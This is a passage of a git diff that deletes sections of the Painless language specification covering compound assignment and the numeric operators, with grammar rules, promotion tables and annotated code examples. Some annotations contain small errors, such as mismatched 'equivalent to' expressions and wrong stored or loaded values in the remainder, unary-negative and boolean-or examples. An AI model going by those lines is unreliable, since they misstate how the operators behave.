shortcut for an assignment -where a binary operation would occur between the variable/field as the -left-hand side expression and a separate right-hand side expression. - -A compound assignment is equivalent to the expression below where V is the -variable/field and T is the type of variable/member. - -[source,Painless] ----- -V = (T)(V op expression); ----- - -*Operators* - -The table below shows the available operators for use in a compound assignment. -Each operator follows the casting/promotion rules according to their regular -definition. For numeric operations there is an extra implicit cast when -necessary to return the promoted numeric type value to the original numeric type -value of the variable/field and can result in data loss. - -|==== -|Operator|Compound Symbol -|Multiplication|*= -|Division|/= -|Remainder|%= -|Addition|+= -|Subtraction|-= -|Left Shift|+++<<=+++ -|Right Shift|>>= -|Unsigned Right Shift|>>>= -|Bitwise And|&= -|Boolean And|&= -|Bitwise Xor|^= -|Boolean Xor|^= -|Bitwise Or|\|= -|Boolean Or|\|= -|String Concatenation|+= -|==== - -*Errors* - -* If the type of value is unable to match the type of variable or field. - -*Grammar* - -[source,ANTLR4] ----- -compound_assignment: ( ID | field ) '$=' expression; ----- - -Note the use of the `$=` represents the use of any of the possible binary -operators. - -*Examples* - -* Compound assignment for each numeric operator. 
-+ -[source,Painless] ----- -int i = 10; <1> -i *= 2; <2> -i /= 5; <3> -i %= 3; <4> -i += 5; <5> -i -= 5; <6> -i <<= 2; <7> -i >>= 1; <8> -i >>>= 1; <9> -i &= 15; <10> -i ^= 12; <11> -i |= 2; <12> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> load from `i` -> `int 10`; - multiply `int 10` and `int 2` -> `int 20`; - store `int 20` to `i`; - (note this is equivalent to `i = i*2`) -<3> load from `i` -> `int 20`; - divide `int 20` by `int 5` -> `int 4`; - store `int 4` to `i`; - (note this is equivalent to `i = i/5`) -<4> load from `i` -> `int 4`; - remainder `int 4` by `int 3` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i%3`) -<5> load from `i` -> `int 1`; - add `int 1` and `int 5` -> `int 6`; - store `int 6` to `i`; - (note this is equivalent to `i = i+5`) -<6> load from `i` -> `int 6`; - subtract `int 5` from `int 6` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i-5`) -<7> load from `i` -> `int 1`; - left shift `int 1` by `int 2` -> `int 4`; - store `int 4` to `i`; - (note this is equivalent to `i = i<<2`) -<8> load from `i` -> `int 4`; - right shift `int 4` by `int 1` -> `int 2`; - store `int 2` to `i`; - (note this is equivalent to `i = i>>1`) -<9> load from `i` -> `int 2`; - unsigned right shift `int 2` by `int 1` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i>>>1`) -<10> load from `i` -> `int 1`; - bitwise and `int 1` and `int 15` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i&2`) -<11> load from `i` -> `int 1`; - bitwise xor `int 1` and `int 12` -> `int 13`; - store `int 13` to `i`; - (note this is equivalent to `i = i^2`) -<12> load from `i` -> `int 13`; - bitwise or `int 13` and `int 2` -> `int 15`; - store `int 15` to `i`; - (note this is equivalent to `i = i|2`) -+ -* Compound assignment for each boolean operator. -+ -[source,Painless] ----- -boolean b = true; <1> -b &= false; <2> -b ^= false; <3> -b |= true; <4> ----- -+ -<1> declare `boolean b`; - store `boolean true` in `b`; -<2> load from `b` -> `boolean true`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `b`; - (note this is equivalent to `b = b && false`) -<3> load from `b` -> `boolean false`; - boolean xor `boolean false` and `boolean false` -> `boolean false`; - store `boolean false` to `b`; - (note this is equivalent to `b = b ^ false`) -<4> load from `b` -> `boolean true`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `b`; - (note this is equivalent to `b = b || true`) -+ -* A compound assignment with the string concatenation operator. -+ -[source,Painless] ----- -String s = 'compound'; <1> -s += ' assignment'; <2> ----- -<1> declare `String s`; - store `String 'compound'` to `s`; -<2> load from `s` -> `String 'compound'`; - string concat `String 'compound'` and `String ' assignment''` - -> `String 'compound assignment'`; - store `String 'compound assignment'` to `s`; - (note this is equivalent to `s = s + ' assignment'`) -+ -* A compound assignment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x += 2; <2> ----- -<1> declare `def x`; - implicit cast `int 1` to `def`; - store `def` to `x`; -<2> load from `x` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - implicit cast `int 3` to `def` -> `def`; - store `def` to `x`; - (note this is equivalent to `x = x+2`) -+ -* A compound assignment with an extra implicit cast. 
-+ -[source,Painless] ----- -byte b = 1; <1> -b += 2; <2> ----- -<1> declare `byte b`; - store `byte 1` to `x`; -<2> load from `x` -> `byte 1`; - implicit cast `byte 1 to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - implicit cast `int 3` to `byte 3` -> `byte 3`; - store `byte 3` to `b`; - (note this is equivalent to `b = b+2`) diff --git a/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc b/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc deleted file mode 100644 index 1b08d9c3361..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc +++ /dev/null @@ -1,1339 +0,0 @@ -[[painless-operators-numeric]] -=== Operators: Numeric - -[[post-increment-operator]] -==== Post Increment - -Use the `post increment operator '++'` to INCREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded prior to the -increment. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -post_increment: ( variable | field ) '++'; ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Post increment with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> -i++; <2> -long j = 1; <3> -long k; <4> -k = j++; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - add `int 0` and `int 1` -> `int 1`; - implicit cast `int 1` to `short 1`; - store `short 1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - store `long 1` to `k`; - add `long 1` and `long 1` -> `long 2`; - store `long 2` to `j` -+ -* Post increment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x++; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - add `int 1` and `int 1` -> `int 2`; - implicit cast `int 2` to `def`; - store `def` to `x` - -[[post-decrement-operator]] -==== Post Decrement - -Use the `post decrement operator '--'` to DECREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded prior to -the decrement. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -post_decrement: ( variable | field ) '--'; ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Post decrement with different numeric types. 
-+ -[source,Painless] ----- -short i = 0; <1> -i--; <2> -long j = 1; <3> -long k; <4> -k = j--; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - subtract `int 1` from `int 0` -> `int -1`; - implicit cast `int -1` to `short -1`; - store `short -1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - store `long 1` to `k`; - subtract `long 1` from `long 1` -> `long 0`; - store `long 0` to `j` -+ -* Post decrement with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x--; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - subtract `int 1` from `int 1` -> `int 0`; - implicit cast `int 0` to `def`; - store `def` to `x` - -[[pre-increment-operator]] -==== Pre Increment - -Use the `pre increment operator '++'` to INCREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded after the -increment. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -pre_increment: '++' ( variable | field ); ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Pre increment with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> -++i; <2> -long j = 1; <3> -long k; <4> -k = ++j; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - add `int 0` and `int 1` -> `int 1`; - implicit cast `int 1` to `short 1`; - store `short 1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - add `long 1` and `long 1` -> `long 2`; - store `long 2` to `j`; - store `long 2` to `k` -+ -* Pre increment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -++x; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - add `int 1` and `int 1` -> `int 2`; - implicit cast `int 2` to `def`; - store `def` to `x` - -[[pre-decrement-operator]] -==== Pre Decrement - -Use the `pre decrement operator '--'` to DECREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded after the -decrement. - -*Errors* - -* If the variable/field is a non-numeric type. 
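-
-A minimal sketch (added for illustration, not part of the original examples)
-contrasting the post and pre forms when the value is read as part of a larger
-expression:
-
-[source,Painless]
----
-int j = 1;
-int post = j--; // `post` is `int 1`: the value is loaded prior to the decrement, then `j` becomes `int 0`
-int pre = --j;  // `j` is decremented to `int -1` first, so `pre` is `int -1`
----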
- -*Grammar* - -[source,ANTLR4] ----- -pre_decrement: '--' ( variable | field ); ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Pre decrement with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> ---i; <2> -long j = 1; <3> -long k; <4> -k = --j; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - subtract `int 1` from `int 0` -> `int -1`; - implicit cast `int -1` to `short -1`; - store `short -1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - subtract `long 1` from `long 1` -> `long 0`; - store `long 0` to `j` - store `long 0` to `k`; -+ -* Pre decrement operator with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> ---x; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - subtract `int 1` from `int 1` -> `int 0`; - implicit cast `int 0` to `def`; - store `def` to `x` - -[[unary-positive-operator]] -==== Unary Positive - -Use the `unary positive operator '+'` to the preserve the IDENTITY of a -numeric type value. - -*Errors* - -* If the value is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -unary_positive: '+' expression; ----- - -*Examples* - -* Unary positive with different numeric types. -+ -[source,Painless] ----- -int x = +1; <1> -long y = +x; <2> ----- -+ -<1> declare `int x`; - identity `int 1` -> `int 1`; - store `int 1` to `x` -<2> declare `long y`; - load from `x` -> `int 1`; - identity `int 1` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `y` -+ -* Unary positive with the `def` type. -+ -[source,Painless] ----- -def z = +1; <1> -int i = +z; <2> ----- -<1> declare `def z`; - identity `int 1` -> `int 1`; - implicit cast `int 1` to `def`; - store `def` to `z` -<2> declare `int i`; - load from `z` -> `def`; - implicit cast `def` to `int 1`; - identity `int 1` -> `int 1`; - store `int 1` to `i`; - -[[unary-negative-operator]] -==== Unary Negative - -Use the `unary negative operator '-'` to NEGATE a numeric type value. - -*Errors* - -* If the value is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -unary_negative: '-' expression; ----- - -*Examples* - -* Unary negative with different numeric types. -+ -[source,Painless] ----- -int x = -1; <1> -long y = -x; <2> ----- -+ -<1> declare `int x`; - negate `int 1` -> `int -1`; - store `int -1` to `x` -<2> declare `long y`; - load from `x` -> `int 1`; - negate `int -1` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `y` -+ -* Unary negative with the `def` type. 
-+ -[source,Painless] ----- -def z = -1; <1> -int i = -z; <2> ----- -<1> declare `def z`; - negate `int 1` -> `int -1`; - implicit cast `int -1` to `def`; - store `def` to `z` -<2> declare `int i`; - load from `z` -> `def`; - implicit cast `def` to `int -1`; - negate `int -1` -> `int 1`; - store `int 1` to `i`; - -[[bitwise-not-operator]] -==== Bitwise Not - -Use the `bitwise not operator '~'` to NOT each bit in an integer type value -where a `1-bit` is flipped to a resultant `0-bit` and a `0-bit` is flipped to a -resultant `1-bit`. - -*Errors* - -* If the value is a non-integer type. - -*Bits* - -[options="header",cols="<1,<1"] -|==== -| original | result -| 1 | 0 -| 0 | 1 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_not: '~' expression; ----- - -*Promotion* - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Bitwise not with different numeric types. -+ -[source,Painless] ----- -byte b = 1; <1> -int i = ~b; <2> -long l = ~i; <3> ----- -+ -<1> declare `byte x`; - store `byte 1` to b -<2> declare `int i`; - load from `b` -> `byte 1`; - implicit cast `byte 1` to `int 1` -> `int 1`; - bitwise not `int 1` -> `int -2`; - store `int -2` to `i` -<3> declare `long l`; - load from `i` -> `int -2`; - implicit cast `int -2` to `long -2` -> `long -2`; - bitwise not `long -2` -> `long 1`; - store `long 1` to `l` -+ -* Bitwise not with the `def` type. -+ -[source,Painless] ----- -def d = 1; <1> -def e = ~d; <2> ----- -+ -<1> declare `def d`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `d`; -<2> declare `def e`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - bitwise not `int 1` -> `int -2`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `e` - -[[multiplication-operator]] -==== Multiplication - -Use the `multiplication operator '*'` to MULTIPLY together two numeric type -values. Rules for resultant overflow and NaN values follow the JVM -specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -multiplication: expression '*' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Multiplication with different numeric types. -+ -[source,Painless] ----- -int i = 5*4; <1> -double d = i*7.0; <2> ----- -+ -<1> declare `int i`; - multiply `int 4` by `int 5` -> `int 20`; - store `int 20` in `i` -<2> declare `double d`; - load from `int i` -> `int 20`; - promote `int 20` and `double 7.0`: result `double`; - implicit cast `int 20` to `double 20.0` -> `double 20.0`; - multiply `double 20.0` by `double 7.0` -> `double 140.0`; - store `double 140.0` to `d` -+ -* Multiplication with the `def` type. 
-+ -[source,Painless] ----- -def x = 5*4; <1> -def y = x*2; <2> ----- -<1> declare `def x`; - multiply `int 5` by `int 4` -> `int 20`; - implicit cast `int 20` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 20`; - multiply `int 20` by `int 2` -> `int 40`; - implicit cast `int 40` to `def` -> `def`; - store `def` to `y` - -[[division-operator]] -==== Division - -Use the `division operator '/'` to DIVIDE one numeric type value by another. -Rules for NaN values and division by zero follow the JVM specification. Division -with integer values drops the remainder of the resultant value. - -*Errors* - -* If either of the values is a non-numeric type. -* If a left-hand side integer type value is divided by a right-hand side integer - type value of `0`. - -*Grammar* - -[source,ANTLR4] ----- -division: expression '/' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Division with different numeric types. -+ -[source,Painless] ----- -int i = 29/4; <1> -double d = i/7.0; <2> ----- -+ -<1> declare `int i`; - divide `int 29` by `int 4` -> `int 7`; - store `int 7` in `i` -<2> declare `double d`; - load from `int i` -> `int 7`; - promote `int 7` and `double 7.0`: result `double`; - implicit cast `int 7` to `double 7.0` -> `double 7.0`; - divide `double 7.0` by `double 7.0` -> `double 1.0`; - store `double 1.0` to `d` -+ -* Division with the `def` type. -+ -[source,Painless] ----- -def x = 5/4; <1> -def y = x/2; <2> ----- -<1> declare `def x`; - divide `int 5` by `int 4` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 1`; - divide `int 1` by `int 2` -> `int 0`; - implicit cast `int 0` to `def` -> `def`; - store `def` to `y` - -[[remainder-operator]] -==== Remainder - -Use the `remainder operator '%'` to calculate the REMAINDER for division -between two numeric type values. Rules for NaN values and division by zero follow the JVM -specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -remainder: expression '%' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Remainder with different numeric types. 
-+ -[source,Painless] ----- -int i = 29%4; <1> -double d = i%7.0; <2> ----- -+ -<1> declare `int i`; - remainder `int 29` by `int 4` -> `int 1`; - store `int 7` in `i` -<2> declare `double d`; - load from `int i` -> `int 1`; - promote `int 1` and `double 7.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double 1.0`; - remainder `double 1.0` by `double 7.0` -> `double 1.0`; - store `double 1.0` to `d` -+ -* Remainder with the `def` type. -+ -[source,Painless] ----- -def x = 5%4; <1> -def y = x%2; <2> ----- -<1> declare `def x`; - remainder `int 5` by `int 4` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 1`; - remainder `int 1` by `int 2` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` - -[[addition-operator]] -==== Addition - -Use the `addition operator '+'` to ADD together two numeric type values. Rules -for resultant overflow and NaN values follow the JVM specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -addition: expression '+' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Addition operator with different numeric types. -+ -[source,Painless] ----- -int i = 29+4; <1> -double d = i+7.0; <2> ----- -+ -<1> declare `int i`; - add `int 29` and `int 4` -> `int 33`; - store `int 33` in `i` -<2> declare `double d`; - load from `int i` -> `int 33`; - promote `int 33` and `double 7.0`: result `double`; - implicit cast `int 33` to `double 33.0` -> `double 33.0`; - add `double 33.0` and `double 7.0` -> `double 40.0`; - store `double 40.0` to `d` -+ -* Addition with the `def` type. -+ -[source,Painless] ----- -def x = 5+4; <1> -def y = x+2; <2> ----- -<1> declare `def x`; - add `int 5` and `int 4` -> `int 9`; - implicit cast `int 9` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 9`; - add `int 9` and `int 2` -> `int 11`; - implicit cast `int 11` to `def` -> `def`; - store `def` to `y` - -[[subtraction-operator]] -==== Subtraction - -Use the `subtraction operator '-'` to SUBTRACT a right-hand side numeric type -value from a left-hand side numeric type value. Rules for resultant overflow -and NaN values follow the JVM specification. - -*Errors* - -* If either of the values is a non-numeric type. 
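-
-A small illustrative sketch (not part of the original examples) of the JVM
-overflow rules mentioned above; it assumes the `Integer.MIN_VALUE` and
-`Integer.MAX_VALUE` static fields of `Integer` are available from the shared
-API:
-
-[source,Painless]
----
-int low = Integer.MIN_VALUE;
-int wrapped = low - 1; // silently overflows and wraps around to Integer.MAX_VALUE
----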
-
-*Grammar*
-
-[source,ANTLR4]
-----
-subtraction: expression '-' expression;
-----
-
-*Promotion*
-
-[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"]
-|====
-| | byte | short | char | int | long | float | double | def
-| byte | int | int | int | int | long | float | double | def
-| short | int | int | int | int | long | float | double | def
-| char | int | int | int | int | long | float | double | def
-| int | int | int | int | int | long | float | double | def
-| long | long | long | long | long | long | float | double | def
-| float | float | float | float | float | float | float | double | def
-| double | double | double | double | double | double | double | double | def
-| def | def | def | def | def | def | def | def | def
-|====
-
-*Examples*
-
-* Subtraction with different numeric types.
-+
-[source,Painless]
-----
-int i = 29-4; <1>
-double d = i-7.5; <2>
-----
-+
-<1> declare `int i`;
-    subtract `int 4` from `int 29` -> `int 25`;
-    store `int 25` in `i`
-<2> declare `double d`;
-    load from `int i` -> `int 25`;
-    promote `int 25` and `double 7.5`: result `double`;
-    implicit cast `int 25` to `double 25.0` -> `double 25.0`;
-    subtract `double 7.5` from `double 25.0` -> `double 17.5`;
-    store `double 17.5` to `d`
-+
-* Subtraction with the `def` type.
-+
-[source,Painless]
-----
-def x = 5-4; <1>
-def y = x-2; <2>
-----
-<1> declare `def x`;
-    subtract `int 4` from `int 5` -> `int 1`;
-    implicit cast `int 1` to `def` -> `def`;
-    store `def` in `x`
-<2> declare `def y`;
-    load from `x` -> `def`;
-    implicit cast `def` to `int 1`;
-    subtract `int 2` from `int 1` -> `int -1`;
-    implicit cast `int -1` to `def` -> `def`;
-    store `def` to `y`
-
-[[left-shift-operator]]
-==== Left Shift
-
-Use the `left shift operator '<<'` to SHIFT lower order bits to higher order
-bits in a left-hand side integer type value by the distance specified in a
-right-hand side integer type value.
-
-*Errors*
-
-* If either of the values is a non-integer type.
-* If the right-hand side value cannot be cast to an int type.
-
-*Grammar*
-
-[source,ANTLR4]
-----
-left_shift: expression '<<' expression;
-----
-
-*Promotion*
-
-The left-hand side integer type value is promoted as specified in the table
-below. The right-hand side integer type value is always implicitly cast to an
-`int` type value and truncated to the number of bits of the promoted type value.
-
-[options="header",cols="<1,<1"]
-|====
-| original | promoted
-| byte | int
-| short | int
-| char | int
-| int | int
-| long | long
-| def | def
-|====
-
-*Examples*
-
-* Left shift with different integer types.
-+
-[source,Painless]
-----
-int i = 4 << 1; <1>
-long l = i << 2L; <2>
-----
-+
-<1> declare `int i`;
-    left shift `int 4` by `int 1` -> `int 8`;
-    store `int 8` in `i`
-<2> declare `long l`;
-    load from `int i` -> `int 8`;
-    implicit cast `long 2` to `int 2` -> `int 2`;
-    left shift `int 8` by `int 2` -> `int 32`;
-    implicit cast `int 32` to `long 32` -> `long 32`;
-    store `long 32` to `l`
-+
-* Left shift with the `def` type.
-+ -[source,Painless] ----- -def x = 4 << 2; <1> -def y = x << 1; <2> ----- -<1> declare `def x`; - left shift `int 4` by `int 2` -> `int 16`; - implicit cast `int 16` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 16`; - left shift `int 16` by `int 1` -> `int 32`; - implicit cast `int 32` to `def` -> `def`; - store `def` to `y` - -[[right-shift-operator]] -==== Right Shift - -Use the `right shift operator '>>'` to SHIFT higher order bits to lower order -bits in a left-hand side integer type value by the distance specified in a -right-hand side integer type value. The highest order bit of the left-hand side -integer type value is preserved. - -*Errors* - -* If either of the values is a non-integer type. -* If the right-hand side value cannot be cast to an int type. - -*Grammar* - -[source,ANTLR4] ----- -right_shift: expression '>>' expression; ----- - -*Promotion* - -The left-hand side integer type value is promoted as specified in the table -below. The right-hand side integer type value is always implicitly cast to an -`int` type value and truncated to the number of bits of the promoted type value. - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Right shift with different integer types. -+ -[source,Painless] ----- -int i = 32 >> 1; <1> -long l = i >> 2L; <2> ----- -+ -<1> declare `int i`; - right shift `int 32` by `int 1` -> `int 16`; - store `int 16` in `i` -<2> declare `long l` - load from `int i` -> `int 16`; - implicit cast `long 2` to `int 2` -> `int 2`; - right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `long 4` -> `long 4`; - store `long 4` to `l` -+ -* Right shift with the `def` type. -+ -[source,Painless] ----- -def x = 16 >> 2; <1> -def y = x >> 1; <2> ----- -<1> declare `def x`; - right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 4`; - right shift `int 4` by `int 1` -> `int 2`; - implicit cast `int 2` to `def` -> `def`; - store `def` to `y` - -[[unsigned-right-shift-operator]] -==== Unsigned Right Shift - -Use the `unsigned right shift operator '>>>'` to SHIFT higher order bits to -lower order bits in a left-hand side integer type value by the distance -specified in a right-hand side type integer value. The highest order bit of the -left-hand side integer type value is *not* preserved. - -*Errors* - -* If either of the values is a non-integer type. -* If the right-hand side value cannot be cast to an int type. - -*Grammar* - -[source,ANTLR4] ----- -unsigned_right_shift: expression '>>>' expression; ----- - -*Promotion* - -The left-hand side integer type value is promoted as specified in the table -below. The right-hand side integer type value is always implicitly cast to an -`int` type value and truncated to the number of bits of the promoted type value. - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Unsigned right shift with different integer types. 
-+ -[source,Painless] ----- -int i = -1 >>> 29; <1> -long l = i >>> 2L; <2> ----- -+ -<1> declare `int i`; - unsigned right shift `int -1` by `int 29` -> `int 7`; - store `int 7` in `i` -<2> declare `long l` - load from `int i` -> `int 7`; - implicit cast `long 2` to `int 2` -> `int 2`; - unsigned right shift `int 7` by `int 2` -> `int 3`; - implicit cast `int 3` to `long 3` -> `long 3`; - store `long 3` to `l` -+ -* Unsigned right shift with the `def` type. -+ -[source,Painless] ----- -def x = 16 >>> 2; <1> -def y = x >>> 1; <2> ----- -<1> declare `def x`; - unsigned right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 4`; - unsigned right shift `int 4` by `int 1` -> `int 2`; - implicit cast `int 2` to `def` -> `def`; - store `def` to `y` - -[[bitwise-and-operator]] -==== Bitwise And - -Use the `bitwise and operator '&'` to AND together each bit within two -integer type values where if both bits at the same index are `1` the resultant -bit is `1` and `0` otherwise. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 1 | 0 -| 0 | 0 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_and: expression '&' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise and with different integer types. -+ -[source,Painless] ----- -int i = 5 & 6; <1> -long l = i & 5L; <2> ----- -+ -<1> declare `int i`; - bitwise and `int 5` and `int 6` -> `int 4`; - store `int 4` in `i` -<2> declare `long l` - load from `int i` -> `int 4`; - promote `int 4` and `long 5`: result `long`; - implicit cast `int 4` to `long 4` -> `long 4`; - bitwise and `long 4` and `long 5` -> `long 4`; - store `long 4` to `l` -+ -* 